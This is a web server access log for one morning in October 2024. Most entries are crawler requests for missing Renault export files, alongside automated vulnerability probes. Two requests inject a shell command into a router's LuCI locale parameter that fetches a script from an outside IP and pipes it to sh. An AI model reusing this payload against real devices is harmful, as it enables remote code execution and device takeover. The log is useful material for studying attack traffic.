156.59.198.136 - - [31/Oct/2024:06:24:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12397754.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
220.132.174.9 - - [31/Oct/2024:06:25:10 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [31/Oct/2024:06:25:18 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11536837.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:25:38 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20210708081311.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:25:59 +0100] "GET /renault.activities.at/htdocs/export/xml/data/exportArticles_20231031194938.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
201.20.100.30 - - [31/Oct/2024:06:30:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
179.43.191.98 - - [31/Oct/2024:06:35:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [31/Oct/2024:06:37:22 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11126920.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:37:44 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10777680.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:38:05 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20180227134529.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
1.165.95.134 - - [31/Oct/2024:06:38:18 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [31/Oct/2024:06:38:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11502468.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:38:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11076660.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:39:08 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12126451.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:39:29 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12323264.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:39:50 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12304745.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:40:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11298171.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:40:32 +0100] "GET /renault.2web.at/htdocs/images/flash/tfile_main.xml HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:40:54 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504328.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:41:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11730152.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:41:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10847554.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:41:57 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/202009151503_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:42:18 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10403657.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:42:39 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10404840.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:43:00 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11580832.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.29 - - [31/Oct/2024:06:43:12 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [31/Oct/2024:06:43:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12493001.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:43:42 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20151125133648.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:44:03 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11348324.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:44:24 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11983666.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:44:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11038575.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:45:06 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10949079.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:45:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10426077.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:45:49 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11046093.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:52:32 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11763078.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
173.231.185.164 - - [31/Oct/2024:06:58:26 +0100] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 375 "-" "xfa1,nvdorz,nvd0rz"
125.228.118.156 - - [31/Oct/2024:06:59:16 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [31/Oct/2024:06:59:32 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20140528110845.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:59:53 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11168266.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:00:14 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10314838.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:00:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12126712.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:00:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10998621.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:01:16 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12323357.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:01:38 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20161220142219.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [31/Oct/2024:07:01:41 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [31/Oct/2024:07:01:59 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/201910231303_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:02:20 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12465214.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:02:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213622.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:03:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202104301003_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:03:24 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11503852.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:03:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12113282.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:04:06 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11358954.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:04:28 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12466235.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.38.232 - - [31/Oct/2024:07:06:51 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
80.66.77.235 - - [31/Oct/2024:07:13:05 +0100] "GET /cgi-bin/main-cgi HTTP/1.1" 404 288 "-" "Mozilla/5.0 zgrab/0.x"
82.62.147.36 - - [31/Oct/2024:07:27:25 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
109.194.248.203 - - [31/Oct/2024:07:30:10 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.135 - - [31/Oct/2024:07:50:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10637265.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:50:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054451.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:50:58 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12127463.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:51:19 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10658280.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:51:40 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10762442.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.195.93.5 - - [31/Oct/2024:07:51:49 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [31/Oct/2024:07:52:01 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10998617.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:52:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12268542.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:52:43 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11810905.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:53:05 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11329047.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:53:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11331586.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:53:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11126928.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:54:08 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11185046.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:07:54:30 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10354875.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:07:54:51 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/inox/inox.xml HTTP/1.0" 404 335 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.79.249.201 - - [31/Oct/2024:07:57:18 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.59.198.135 - - [31/Oct/2024:08:05:06 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10606945.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [31/Oct/2024:08:07:30 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
31.220.1.88 - - [31/Oct/2024:08:09:07 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [31/Oct/2024:08:12:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11320497.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:08:12:44 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20211013072344.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:08:13:05 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11177590.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:13:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11851296.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.211.139.105 - - [31/Oct/2024:08:13:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
156.59.198.136 - - [31/Oct/2024:08:13:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035936.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:14:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202102110803_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:14:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201910170903_RenArticle.xml HTTP/1.0" 404 332 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:08:14:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/exportArticles_20231019095110.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:15:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12129645.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:08:15:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11133507.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:15:54 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/simple/simple.xml HTTP/1.0" 404 338 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:16:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10609043.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:08:16:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11646746.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:08:16:57 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20151201135855.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
